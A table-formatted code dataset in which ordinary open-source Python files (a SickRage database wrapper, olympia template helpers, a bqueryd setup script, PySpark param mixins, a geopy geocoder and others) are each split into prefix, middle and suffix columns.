repo_name stringlengths 5 100 | path stringlengths 4 231 | language stringclasses 1 value | license stringclasses 15 values | size int64 6 947k | score float64 0 0.34 | prefix stringlengths 0 8.16k | middle stringlengths 3 512 | suffix stringlengths 0 8.17k |
|---|---|---|---|---|---|---|---|---|
SerialShadow/SickRage | sickbeard/db.py | Python | gpl-3.0 | 15,583 | 0.003016 | # Author: Nic Wolfe <nic@wolfeden.ca>
# URL: https://sickrage.tv
# Git: https://github.com/SiCKRAGETV/SickRage.git
#
# This file is part of SickRage.
#
# SickRage is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# SickRage is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with SickRage. If not, see <http://www.gnu.org/licenses/>.
from __future__ import with_statement
import os.path
import re
import sqlite3
import time
import threading
import sickbeard
from sickbeard import logger
from sickrage.helper.encoding import ek
from sickrage.helper.exceptions import ex
db_cons = {}
db_locks = {}
def dbFilename(filename="sickbeard.db", suffix=None):
"""
@param filename: The sqlite database filename to use. If not specified,
will be made to be sickbeard.db
@param suffix: The suffix to append to the filename. A '.' will be added
automatically, i.e. suffix='v0' will make dbfile.db.v0
@return: the correct location of the database file.
"""
if suffix:
filename = "%s.%s" % (filename, suffix)
return ek(os.path.join, sickbeard.DATA_DIR, filename)
class DBConnection(object):
def __init__(self, filename="sickbeard.db", suffix=None, row_type=None):
self.filename = filename
self.suffix = suffix
self.row_type = row_type
try:
if self.filename not in db_cons:
db_locks[self.filename] = threading.Lock()
self.connection = sqlite3.connect(dbFilename(self.filename, self.suffix), 20, check_same_thread=False)
self.connection.text_factory = self._unicode_text_factory
db_cons[self.filename] = self.connection
else:
self.connection = db_cons[self.filename]
if self.row_type == "dict":
self.connection.row_factory = self._dict_factory
else:
self.connection.row_factory = sqlite3.Row
except Exception as e:
logger.log(u"DB error: " + ex(e), logger.ERROR)
raise
def _execute(self, query, args):
try:
if not args:
return self.connection.cursor().execute(query)
return self.connection.cursor().execute(query, args)
except Exception as e:
raise
def execute(self, query, args=None, fetchall=False, fetchone=False):
"""
Executes DB query
:param query: Query to execute
:param args: Arguments in query
:param fetchall: Boolean to indicate all results must be fetched
:param fetchone: Boolean to indicate one result must be fetched (to walk results for instance)
:return: query results
"""
try:
if fetchall:
return self._execute(query, args).fetchall()
elif fetchone:
return self._execute(query, args).fetchone()
else:
return self._execute(query, args)
except Exception as e:
raise
def checkDBVersion(self):
"""
Fetch database version
:return: Integer inidicating current DB version
"""
result = None
try:
if self.hasTable('db_version'):
result = self.select("SELECT db_version FROM db_version")
except:
return 0
if result:
return int(result[0]["db_version"])
else:
return 0
def mass_action(self, querylist=[], logTransaction=False, fetchall=False):
"""
Execute multiple queries
:param querylist: list of queries
:param logTransaction: Boolean to wrap all in one transaction
:param fetchall: Boolean, when using a select query force returning all results
:return: list of results
"""
# remove None types
querylist = [i for i in querylist if i is not None and len(i)]
sqlResult = []
attempt = 0
with db_locks[self.filename]:
while attempt < 5:
try:
for qu in querylist:
if len(qu) == 1:
if logTransaction:
logger.log(qu[0], logger.DEBUG)
sqlResult.append(self.execute(qu[0], fetchall=fetchall))
elif len(qu) > 1:
if logTransaction:
logger.log(qu[0] + " with args " + str(qu[1]), logger.DEBUG)
sqlResult.append(self.execute(qu[0], qu[1], fetchall=fetchall))
self.connection.commit()
logger.log(u"Transaction with " + str(len(querylist)) + u" queries executed", logger.DEBUG)
# finished
break
except sqlite3.OperationalError, e:
sqlResult = []
if self.connection:
self.connection.rollback()
if "unable to open database file" in e.args[0] or "database is locked" in e.args[0]:
logger.log(u"DB error: " + ex(e), logger.WARNING)
attempt += 1
time.sleep(1)
else:
logger.log(u"DB error: " + ex(e), logger.ERROR)
raise
except sqlite3.DatabaseError, e:
sqlResult = []
if self.connection:
self.connection.rollback()
logger.log(u"Fatal error executing query: " + ex(e), logger.ERROR)
raise
#time.sleep(0.02)
return sqlResult
def action(self, query, args=None, fetchall=False, fetchone=False):
"""
Execute single query
:param query: Query string
:param args: Arguments to query string
:param fetchall: Boolean to indicate all results must be fetched
:param fetchone: Boolean to indicate one result must be fetched (to walk results for instance)
:return: query results
"""
if query == None:
return
sqlResult = None
attempt = 0
with db_locks[self.filename]:
while attempt < 5:
try:
if args == None:
logger.log(self.filename + ": " + query, logger.DB)
else:
logger.log(self.filename + ": " + query + " with args " + str(args), logger.DB)
sqlResult = self.execute(query, args, fetchall=fetchall, fetchone=fetchone)
self.connection.commit()
| # get out of the connection attempt loop since we were successful
break
except sqlite3.OperationalError, e:
if "unable to open database file" in e.args[0] or "database is locked" in e.args[0]:
logger.log(u"DB error: " + ex(e), logger.WARNING)
attempt += 1
time.sleep(1)
else:
logger.log(u"DB error: " + ex(e), logger.ERROR)
raise
except sqlite3.DatabaseError, e:
logger.log(u"Fatal error executing query: " + ex(e), logger.ERROR)
raise
#time.sleep(0.02)
return sqlResult
def select(self, query, args=None):
"""
Perform single select query on database
:param query: query string
:param args: arguments to query string
:return: query results
"""
| |
lavish205/olympia | src/olympia/amo/templatetags/jinja_helpers.py | Python | bsd-3-clause | 19,484 | 0.000103 | import collections
import json as jsonlib
import os
import random
import re
from operator import attrgetter
from urlparse import urljoin
from django.conf import settings
from django.core.exceptions import ObjectDoesNotExist
from django.forms import CheckboxInput
from django.template import defaultfilters, loader
from django.utils.encoding import smart_text
from django.utils.functional import lazy
from django.utils.html import format_html as django_format_html
from django.utils.safestring import mark_safe
from django.utils.translation import (
get_language, to_locale, trim_whitespace, ugettext)
import jinja2
import waffle
from babel.support import Format
from django_jinja import library
from rest_framework.reverse import reverse as drf_reverse
from rest_framework.settings import api_settings
from olympia import amo
from olympia.amo import urlresolvers, utils
from olympia.constants.licenses import PERSONA_LICENSES_IDS
from olympia.lib.jingo_minify_helpers import (
_build_html, _get_compiled_css_url, get_css_urls, get_js_urls, get_path,
is_external)
from olympia.lib.cache import cache_get_or_set, make_key
# Registering some utils as filters:
urlparams = library.filter(utils.urlparams)
library.filter(utils.epoch)
library.filter(utils.isotime)
library.global_function(dict)
library.global_function(utils.randslice)
# Mark a lazy marked instance as safe but keep
# it lazy
mark_safe_lazy = lazy(mark_safe, unicode)
@library.global_function
def switch_is_active(switch_name):
return waffle.switch_is_active(switch_name)
@library.filter
def link(item):
html = """<a href="%s">%s</a>""" % (item.get_url_path(),
jinja2.escape(item.name))
return jinja2.Markup(html)
@library.filter
def xssafe(value):
"""
Like |safe but for strings with interpolation.
By using |xssafe you assert that you have written tests proving an
XSS can't happen here.
"""
return jinja2.Markup(value)
@library.global_function
def locale_url(url):
"""Take a URL and give it the locale prefix."""
prefixer = urlresolvers.get_url_prefix()
script = prefixer.request.META['SCRIPT_NAME']
parts = [script, prefixer.locale, url.lstrip('/')]
return '/'.join(parts)
@library.global_function
def url(viewname, *arg | s, **kwargs):
| """Helper for Django's ``reverse`` in templates."""
add_prefix = kwargs.pop('add_prefix', True)
host = kwargs.pop('host', '')
src = kwargs.pop('src', '')
url = '%s%s' % (host, urlresolvers.reverse(viewname,
args=args,
kwargs=kwargs,
add_prefix=add_prefix))
if src:
url = urlparams(url, src=src)
return url
@library.global_function
@jinja2.contextfunction
def drf_url(context, viewname, *args, **kwargs):
"""Helper for DjangoRestFramework's ``reverse`` in templates."""
request = context.get('request')
if request:
if not hasattr(request, 'versioning_scheme'):
request.versioning_scheme = api_settings.DEFAULT_VERSIONING_CLASS()
request.version = request.versioning_scheme.determine_version(
request, *args, **kwargs)
return drf_reverse(viewname, request=request, args=args, kwargs=kwargs)
@library.global_function
def services_url(viewname, *args, **kwargs):
"""Helper for ``url`` with host=SERVICES_URL."""
kwargs.update({'host': settings.SERVICES_URL})
return url(viewname, *args, **kwargs)
@library.filter
def paginator(pager):
return PaginationRenderer(pager).render()
@library.filter
def impala_paginator(pager):
t = loader.get_template('amo/impala/paginator.html')
return jinja2.Markup(t.render({'pager': pager}))
@library.global_function
def sidebar(app):
"""Populates the sidebar with (categories, types)."""
from olympia.addons.models import Category
if app is None:
return [], []
# Fetch categories...
qs = Category.objects.filter(application=app.id, weight__gte=0,
type=amo.ADDON_EXTENSION)
# Now sort them in python according to their name property (which looks up
# the translated name using gettext + our constants)
categories = sorted(qs, key=attrgetter('weight', 'name'))
Type = collections.namedtuple('Type', 'id name url')
base = urlresolvers.reverse('home')
types = [Type(99, ugettext('Collections'), base + 'collections/')]
shown_types = {
amo.ADDON_PERSONA: urlresolvers.reverse('browse.personas'),
amo.ADDON_DICT: urlresolvers.reverse('browse.language-tools'),
amo.ADDON_SEARCH: urlresolvers.reverse('browse.search-tools'),
amo.ADDON_THEME: urlresolvers.reverse('browse.themes'),
}
titles = dict(
amo.ADDON_TYPES,
**{amo.ADDON_DICT: ugettext('Dictionaries & Language Packs')})
for type_, url in shown_types.items():
if type_ in app.types:
types.append(Type(type_, titles[type_], url))
return categories, sorted(types, key=lambda x: x.name)
class PaginationRenderer(object):
def __init__(self, pager):
self.pager = pager
self.max = 10
self.span = (self.max - 1) / 2
self.page = pager.number
self.num_pages = pager.paginator.num_pages
self.count = pager.paginator.count
pager.page_range = self.range()
pager.dotted_upper = self.num_pages not in pager.page_range
pager.dotted_lower = 1 not in pager.page_range
def range(self):
"""Return a list of page numbers to show in the paginator."""
page, total, span = self.page, self.num_pages, self.span
if total < self.max:
lower, upper = 0, total
elif page < span + 1:
lower, upper = 0, span * 2
elif page > total - span:
lower, upper = total - span * 2, total
else:
lower, upper = page - span, page + span - 1
return range(max(lower + 1, 1), min(total, upper) + 1)
def render(self):
c = {'pager': self.pager, 'num_pages': self.num_pages,
'count': self.count}
t = loader.get_template('amo/paginator.html').render(c)
return jinja2.Markup(t)
def _get_format():
lang = get_language()
return Format(utils.get_locale_from_lang(lang))
@library.filter
def numberfmt(num, format=None):
return _get_format().decimal(num, format)
def page_name(app=None):
"""Determine the correct page name for the given app (or no app)."""
if app:
return ugettext(u'Add-ons for {0}').format(app.pretty)
else:
return ugettext('Add-ons')
@library.global_function
@jinja2.contextfunction
def page_title(context, title):
title = smart_text(title)
base_title = page_name(context['request'].APP)
# The following line doesn't use string formatting because we want to
# preserve the type of `title` in case it's a jinja2 `Markup` (safe,
# escaped) object.
return django_format_html(u'{} :: {}', title, base_title)
@library.filter
def json(s):
return jsonlib.dumps(s)
@library.filter
def absolutify(url, site=None):
"""Takes a URL and prepends the SITE_URL"""
if url.startswith('http'):
return url
else:
return urljoin(site or settings.SITE_URL, url)
@library.filter
def strip_controls(s):
"""
Strips control characters from a string.
"""
# Translation table of control characters.
control_trans = dict((n, None) for n in xrange(32) if n not in [10, 13])
rv = unicode(s).translate(control_trans)
return jinja2.Markup(rv) if isinstance(s, jinja2.Markup) else rv
@library.filter
def external_url(url):
"""Bounce a URL off outgoing.prod.mozaws.net."""
return urlresolvers.get_outgoing_url(unicode(url))
@library.filter
def shuffle(sequence):
"""Shuffle a sequence."""
random.shuffle(sequence)
return sequence
@library.global_function
def license_link(license):
"""Link to a code license, including icon where applicable."""
# If passed in an integer, try to look up the License.
|
seansu4you87/kupo | projects/MOOCs/udacity/ud120-ml/projects/outliers/outlier_cleaner.py | Python | mit | 753 | 0.007968 | #!/usr/bin/python
import math
def outlierCleaner(predictions, ages, net_worths):
"""
Clean away the 10% of poi | nts that have the largest
residual errors (difference between the prediction
and the actual net worth).
Return a list of tuples named cleaned_data where
each tuple is of the form (age, net_worth, error).
"""
### your code goes here
data = []
for i in xrange(len(ages)):
data.append((ages[i], net_worths[i], _error(predictions[i], net_worths[i])))
sorted_data = sorted(data, key = lambda x: x[2])
print sorted_data
length = int(0.9 | * len(sorted_data))
return sorted_data[0:length]
def _error(expected, actual):
return math.pow(actual - expected, 2)
|
visualfabriq/bqueryd | setup.py | Python | bsd-3-clause | 4,002 | 0.00075 | from __future__ import absolute_import
########################################################################
# File based on https://github.com/Blosc/bcolz
########################################################################
#
# License: BSD
# Created: October 5, 2015
# Author: Carst Vaartjes - cvaartjes@visualfabriq.com
#
########################################################################
import codecs
import os
from setuptools import setup, Extension, find_packages
from os.path | import abspath
from sys import version_info as v
from setuptools.co | mmand.build_ext import build_ext as _build_ext
# Check this Python version is supported
if any([v < (2, 6), (3,) < v < (3, 5)]):
raise Exception("Unsupported Python version %d.%d. Requires Python >= 2.7 "
"or >= 3.5." % v[:2])
class build_ext(_build_ext):
def finalize_options(self):
_build_ext.finalize_options(self)
# Prevent numpy from thinking it is still in its setup process:
__builtins__.__NUMPY_SETUP__ = False
import numpy
self.include_dirs.append(numpy.get_include())
HERE = os.path.abspath(os.path.dirname(__file__))
def read(*parts):
"""
Build an absolute path from *parts* and and return the contents of the
resulting file. Assume UTF-8 encoding.
"""
with codecs.open(os.path.join(HERE, *parts), "rb", "utf-8") as f:
return f.read()
def get_version():
version = {}
with open("bqueryd/version.py") as fp:
exec (fp.read(), version)
return version
# Sources & libraries
inc_dirs = [abspath('bqueryd')]
try:
import numpy as np
inc_dirs.append(np.get_include())
except ImportError as e:
pass
lib_dirs = []
libs = []
def_macros = []
sources = []
cmdclass = {'build_ext': build_ext}
optional_libs = ['numexpr>=2.6.9']
install_requires = [
'bquery>=0.2.10',
'pyzmq>=17.1.2',
'redis>=3.0.1',
'boto3>=1.9.82',
'smart_open>=1.9.0',
'netifaces>=0.10.9',
'configobj>=5.0.6',
'psutil>=5.0.0',
'azure-storage-blob==12.0.0',
]
setup_requires = []
tests_requires = [
'pandas>=0.23.1',
'pytest>=4.0.0',
'pytest-cov>=2.6.0',
'codacy-coverage>=1.3.7',
]
extras_requires = []
ext_modules = []
package_data = {}
classifiers = [
'Development Status :: 4 - Beta',
'Intended Audience :: Developers',
'Intended Audience :: Information Technology',
'Intended Audience :: Science/Research',
'License :: OSI Approved :: BSD License',
'Programming Language :: Python',
'Topic :: Software Development :: Libraries :: Python Modules',
'Operating System :: Microsoft :: Windows',
'Operating System :: Unix',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
]
setup(
name="bqueryd",
version=get_version()['__version__'],
description='A distribution framework for Bquery',
long_description=read("README.md"),
long_description_content_type='text/markdown',
classifiers=classifiers,
author='Carst Vaartjes',
author_email='cvaartjes@visualfabriq.com',
maintainer='Carst Vaartjes',
maintainer_email='cvaartjes@visualfabriq.com',
url='https://github.com/visualfabriq/bqueryd',
license='GPL2',
platforms=['any'],
ext_modules=ext_modules,
cmdclass=cmdclass,
install_requires=install_requires,
setup_requires=setup_requires,
tests_require=tests_requires,
extras_require=dict(
optional=extras_requires,
test=tests_requires
),
packages=find_packages(),
package_data=package_data,
include_package_data=True,
zip_safe=True,
entry_points={
'console_scripts': [
'bqueryd = bqueryd.node:main'
]
}
)
|
knoguchi/nadex | nadex/rest_exceptions.py | Python | gpl-2.0 | 1,349 | 0 | # REST API exceptions
class HttpException(Exception):
"""
Class for representing http errors. Contains the response.
"""
def __init__(self, msg, res):
super(Exception, self).__init__(msg)
self.response = res
@property
def status_code(self):
return self.response.status_code
@property
def headers(self):
return self.response.headers
@property
def content(self):
return self.response.content
# 204
class EmptyResponseWarning(HttpException):
pass
# 4xx codes
class ClientRequestException(HttpException):
pass
# class Unauthorised(ClientRequestException):
# pass
# class AccessForbidden(ClientRequestException):
# pass
# class ResourceNotFound(ClientRequestException):
# pass
# class ContentNotAcceptable(ClientRequestException):
# pass
# 5xx codes
class ServerException(HttpException):
pass
# class ServiceUnavailable(ServerException):
# pass
# class StorageCapacityError(ServerException):
# pass
# class BandwidthExceeded(ServerEx | ception):
# pass
# 405 and 501 - still just means the client has to change their request
# class UnsupportedRequest(ClientRequestException, ServerExce | ption):
# pass
# 3xx codes
class RedirectionException(HttpException):
pass
class NotLoggedInException(Exception):
pass
|
poldrack/openfmri | openfmri_paper/8.2_mds_wholebrain.py | Python | bsd-2-clause | 3,290 | 0.026748 | #!/usr/bin/env python
""" tsne_openfmri.py: code to run t-SNE on results from MELODIC ICA applied to the OpenFMRI dataset
requires:
- tsne.py from http://homepage.tudelft.nl/19j49/t-SNE.html
- Numpy
"""
## Copyright 2011, Russell Poldrack. All rights reserved.
## Redistribution and use in source and binary forms, with or without modification, are
## permitted provided that the following conditions are met:
## 1. Redistributions of source code must retain the above copyright notice, this list of
## conditions and the following disclaimer.
## 2. Redistributions in binary form must reproduce the above copyright notice, this list
## of conditions and the following disclaimer in the documentation and/or other materials
## provided with the distribution.
## THIS SOFTWARE IS PROVIDED BY RUSSELL POLDRACK ``AS IS'' AND ANY EXPRESS OR IMPLIED
## WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
## FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL RUSSELL POLDRACK OR
## CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
## CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
## SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
## ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
## NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
## ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import numpy as N
import matplotlib.pyplot as plt
import matplotlib.font_manager as mplfont
import os
from sklearn import manifold
from sklearn.metrics import euclidean_distances
from scipy.spatial.distance import pdist,squareform
outdir='/corral-repl/utexas/poldracklab/openfmri/analyses/paper_analysis_Dec2012/clustering'
if 0:
#X=N.loadtxt('/corral-repl/utexas/poldracklab/openfmri/analyses/paper_analysis_Dec2012/ICA/datarun1_icarun1_200comp.txt')
X=N.load('/corral-repl/utexas/poldracklab/openfmri/analyse | s/paper_analysis_Dec2012/data_prep/zstat_run1.npy').T
clf = manifold.MDS(n_components=2, n_init=1, max_iter=1000)
#dist=euclidean_distances(X)
| dist=squareform(pdist(X,metric='euclidean'))
t=clf.fit_transform(dist)
taskinfo=N.loadtxt('/corral-repl/utexas/poldracklab/openfmri/analyses/paper_analysis_Dec2012/data_prep/data_key_run1.txt')
tasknums=N.unique(taskinfo[:,0])
# compute scatter for each task
t_eucdist={}
mean_t_obs={}
for k in tasknums:
obs=N.where(taskinfo[:,0]==k)[0]
t_obs=t[obs,:]
mean_t_obs[k]=N.mean(t_obs,0)
t_eucdist[k]=N.mean(N.sqrt((t_obs[:,0]-mean_t_obs[k][0])**2 + (t_obs[:,1]-mean_t_obs[k][1])**2 ))
plt.clf()
plt.axis([-800,700,-700,700])
plt.scatter(t[:,0],t[:,1],s=0) # create axes
#f=open('tasklabels.txt','w')
for i in range(len(t)):
x,y=t[i,:]
plt.text(x,y,'%d'%taskinfo[i,0],fontsize=8,color='0.5') #,color=colors[i])
# f.write('%d\n'%dstask[copedata[i,0]][copedata[i,1]])
for i in tasknums:
plt.text(mean_t_obs[i][0],mean_t_obs[i][1],'%d'%i,fontsize=t_eucdist[i]*0.08)
#f.close()
# print legend:
plt.savefig(os.path.join(outdir,'wholebrain_mds_fig.pdf'),format='pdf')
N.save(os.path.join(outdir,'wholebrain_mds_solution.npy'),t)
|
holdenk/spark | python/pyspark/ml/param/shared.py | Python | apache-2.0 | 24,706 | 0.001376 | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# DO NOT MODIFY THIS FILE! It was generated by _shared_params_code_gen.py.
from typing import List
from pyspark.ml.param import *
class HasMaxIter(Params):
"""
Mixin for param maxIter: max number of iterations (>= 0).
"""
maxIter: "Param[int]" = Param(
Params._dummy(),
"maxIter",
"max number of iterations (>= 0).",
typeConverter=TypeConverters.toInt,
)
def __init__(self) -> None:
super(HasMaxIter, self).__init__()
def getMaxIter(self) -> int:
"""
Gets the value of maxIter or its default value.
"""
return | self.getOrDefault(self.maxIter)
class | HasRegParam(Params):
"""
Mixin for param regParam: regularization parameter (>= 0).
"""
regParam: "Param[float]" = Param(
Params._dummy(),
"regParam",
"regularization parameter (>= 0).",
typeConverter=TypeConverters.toFloat,
)
def __init__(self) -> None:
super(HasRegParam, self).__init__()
def getRegParam(self) -> float:
"""
Gets the value of regParam or its default value.
"""
return self.getOrDefault(self.regParam)
class HasFeaturesCol(Params):
"""
Mixin for param featuresCol: features column name.
"""
featuresCol: "Param[str]" = Param(
Params._dummy(),
"featuresCol",
"features column name.",
typeConverter=TypeConverters.toString,
)
def __init__(self) -> None:
super(HasFeaturesCol, self).__init__()
self._setDefault(featuresCol="features")
def getFeaturesCol(self) -> str:
"""
Gets the value of featuresCol or its default value.
"""
return self.getOrDefault(self.featuresCol)
class HasLabelCol(Params):
"""
Mixin for param labelCol: label column name.
"""
labelCol: "Param[str]" = Param(
Params._dummy(),
"labelCol",
"label column name.",
typeConverter=TypeConverters.toString,
)
def __init__(self) -> None:
super(HasLabelCol, self).__init__()
self._setDefault(labelCol="label")
def getLabelCol(self) -> str:
"""
Gets the value of labelCol or its default value.
"""
return self.getOrDefault(self.labelCol)
class HasPredictionCol(Params):
"""
Mixin for param predictionCol: prediction column name.
"""
predictionCol: "Param[str]" = Param(
Params._dummy(),
"predictionCol",
"prediction column name.",
typeConverter=TypeConverters.toString,
)
def __init__(self) -> None:
super(HasPredictionCol, self).__init__()
self._setDefault(predictionCol="prediction")
def getPredictionCol(self) -> str:
"""
Gets the value of predictionCol or its default value.
"""
return self.getOrDefault(self.predictionCol)
class HasProbabilityCol(Params):
"""
Mixin for param probabilityCol: Column name for predicted class conditional probabilities. Note: Not all models output well-calibrated probability estimates! These probabilities should be treated as confidences, not precise probabilities.
"""
probabilityCol: "Param[str]" = Param(
Params._dummy(),
"probabilityCol",
"Column name for predicted class conditional probabilities. Note: Not all models output well-calibrated probability estimates! These probabilities should be treated as confidences, not precise probabilities.",
typeConverter=TypeConverters.toString,
)
def __init__(self) -> None:
super(HasProbabilityCol, self).__init__()
self._setDefault(probabilityCol="probability")
def getProbabilityCol(self) -> str:
"""
Gets the value of probabilityCol or its default value.
"""
return self.getOrDefault(self.probabilityCol)
class HasRawPredictionCol(Params):
"""
Mixin for param rawPredictionCol: raw prediction (a.k.a. confidence) column name.
"""
rawPredictionCol: "Param[str]" = Param(
Params._dummy(),
"rawPredictionCol",
"raw prediction (a.k.a. confidence) column name.",
typeConverter=TypeConverters.toString,
)
def __init__(self) -> None:
super(HasRawPredictionCol, self).__init__()
self._setDefault(rawPredictionCol="rawPrediction")
def getRawPredictionCol(self) -> str:
"""
Gets the value of rawPredictionCol or its default value.
"""
return self.getOrDefault(self.rawPredictionCol)
class HasInputCol(Params):
"""
Mixin for param inputCol: input column name.
"""
inputCol: "Param[str]" = Param(
Params._dummy(),
"inputCol",
"input column name.",
typeConverter=TypeConverters.toString,
)
def __init__(self) -> None:
super(HasInputCol, self).__init__()
def getInputCol(self) -> str:
"""
Gets the value of inputCol or its default value.
"""
return self.getOrDefault(self.inputCol)
class HasInputCols(Params):
"""
Mixin for param inputCols: input column names.
"""
inputCols: "Param[List[str]]" = Param(
Params._dummy(),
"inputCols",
"input column names.",
typeConverter=TypeConverters.toListString,
)
def __init__(self) -> None:
super(HasInputCols, self).__init__()
def getInputCols(self) -> List[str]:
"""
Gets the value of inputCols or its default value.
"""
return self.getOrDefault(self.inputCols)
class HasOutputCol(Params):
"""
Mixin for param outputCol: output column name.
"""
outputCol: "Param[str]" = Param(
Params._dummy(),
"outputCol",
"output column name.",
typeConverter=TypeConverters.toString,
)
def __init__(self) -> None:
super(HasOutputCol, self).__init__()
self._setDefault(outputCol=self.uid + "__output")
def getOutputCol(self) -> str:
"""
Gets the value of outputCol or its default value.
"""
return self.getOrDefault(self.outputCol)
class HasOutputCols(Params):
"""
Mixin for param outputCols: output column names.
"""
outputCols: "Param[List[str]]" = Param(
Params._dummy(),
"outputCols",
"output column names.",
typeConverter=TypeConverters.toListString,
)
def __init__(self) -> None:
super(HasOutputCols, self).__init__()
def getOutputCols(self) -> List[str]:
"""
Gets the value of outputCols or its default value.
"""
return self.getOrDefault(self.outputCols)
class HasNumFeatures(Params):
"""
Mixin for param numFeatures: Number of features. Should be greater than 0.
"""
numFeatures: "Param[int]" = Param(
Params._dummy(),
"numFeatures",
"Number of features. Should be greater than 0.",
typeConverter=TypeConverters.toInt,
)
def __init__(self) -> None:
super(HasNumFeatures, self).__init__()
self._setDefault(numFeatures=262144)
def getNumFeatures(self) -> int:
"""
Gets the value of numFeatures or its default value.
"""
return self.getOrDefault(self.numFeatures)
class HasCheckpointInterval(Params):
"""
Mixin for param checkpointInt |
mthh/geopy | geopy/geocoders/mapzen.py | Python | mit | 5,724 | 0 | """
Mapzen geocoder, contributed by Michal Migurski of Mapzen.
"""
from geopy.geocoders.base import (
Geocoder,
DEFAULT_FORMAT_STRING,
DEFAULT_TIMEOUT
)
from geopy.compat import urlencode
from geopy.location import Location
from geopy.util import logger
__all__ = ("Mapzen", )
class Mapzen(Geocoder):
"""
Mapzen Search geocoder. Documentation at:
https://mapzen.com/documentation/search/
"""
def __init__(
self,
api_key,
format_string=DEFAULT_FORMAT_STRING,
boundary_rect=None,
country_bias=None,
timeout=DEFAULT_TIMEOUT,
proxies=None,
user_agent=None
): # pylint: disable=R0913
"""
:param string format_string: String containing '%s' where the
string to geocode should be interpolated before querying the
geocoder. For example: '%s, Mountain View, CA'. The default
is just '%s'.
:param tuple boundary_rect: Coordinates to restrict search within,
given as (west, south, east, north) coordinate tuple.
:param string country_bias: Bias results to this country (ISO alpha-3).
:param dict proxies: If specified, routes this geocoder's requests
through the specified proxy. E.g., {"https": "192.0.2.0"}. For
more information, see documentation on
:class:`urllib2.ProxyHandler`.
.. versionadded:: 0.96
"""
super(Mapzen, self).__init__(
format_string, 'https', timeout, proxies, user_agent=user_agent
)
self.country_bias = country_bias
self.format_string = format_string
self.boundary_rect = boundary_rect
self.api_key = api_key
self.geocode_api = 'https://search.mapzen.com/v1/search'
self.reverse_api = 'https://search.mapzen.com/v1/reverse'
def geocode(
self,
query,
exactly_one=True,
timeout=None,
): # pylint: disable=R0913,W0221
"""
Geocode a location query.
:param query: The address, query or structured query to geocode
you wish to geocode.
:type query: string
:param bool exactly_one: Return one result or a list of results, if
available.
:param int timeout: Time, in seconds, to wait for the geocoding service
to respond before raising a :class:`geopy.exc.GeocoderTimedOut`
exception. Set this only if you wish to override, on this call
only, the value set during the geocoder's initialization.
.. versionadded:: 0.97
"""
params = {'text': self.format_string % query}
params.update({
'api_key': self.api_key
})
if self.boundary_rect:
params['boundary.rect.min_lon'] = self.boundary_rect[0]
params['boundary.rect.min_lat'] = self.boundary_rect[1]
params['boundary.rect.max_lon'] = self.boundary_rect[2]
params['boundary.rect.max_lat'] = self.boundary_rect[3]
if self.country_bias:
params['boundary.country'] = self.country_bias
url = "?".join((self.geocode_api, urlencode(params)))
logger.debug("%s.geocode_api: %s", self.__class__.__name__, url)
return self._parse_json(
self._call_geocoder(url, timeout=timeout), exactly_one
)
def reverse(
self,
query,
exactly_one=True,
timeout=None,
): # pylint: disable=W0221
"""
Returns a reverse geocoded location.
:param query: The coordinates for which you wish to obtain the
closest human-readable addresses.
:type query: :class:`geopy.point.Point`, list or tuple of (latitude,
longitude), or string as "%(latitude)s, %(longitude)s"
:param bool exactly_one: Return one result or a list of results, if
available.
:param int timeout: Time, in seconds, to wait for the geocoding service
to respond before raising a :class:`geopy.exc.GeocoderTimedOut`
exception. Set this only if you wish to override, on this call
only, the value set during the geocoder's initialization.
.. versionadded:: 0.97
"""
try:
lat, lon = [
x.strip() for x in
self._coerce_point_to_string(query).split(',')
] # doh
except ValueError:
raise ValueError("Must be a coordinate pair or Point")
params = {
'point.lat': lat,
'point.lon': lon,
'api_key': self.api_key,
}
url = "?".join((self.reverse_api, urlencode(params)))
logger.debug("%s.reverse: %s", self.__class__.__name__, url)
return self._parse_json(
self._call_geocoder(url, timeout=timeout), exactly_one
)
@staticmethod
def parse_code(feature):
"""
Parse each resource.
"""
latitude = feature.get('geometry', {}).get('coordinates', [])[1]
longitude = feature.get('geometry', {}).get('coordinates', [])[0]
placename = feature.get('prope | rties', {}).get('name')
return Locatio | n(placename, (latitude, longitude), feature)
def _parse_json(self, response, exactly_one):
if response is None:
return None
features = response['features']
if not len(features):
return None
if exactly_one is True:
return self.parse_code(features[0])
else:
return [self.parse_code(feature) for feature in features]
|
Ebag333/Pyfa | eos/effects/sensorcompensationsensorstrengthbonusradar.py | Python | gpl-3.0 | 270 | 0.003704 | # sen | sorCompensationSensorStrengthBonusRadar
#
# Used by:
# Skill: Radar Sensor Compensation
type = "passive"
def handler(fit, container, context):
fit.ship.boostItemAttr("scanRadarStrength", container.getModifiedItemAttr("sensorStrengthBonus") | * container.level)
|
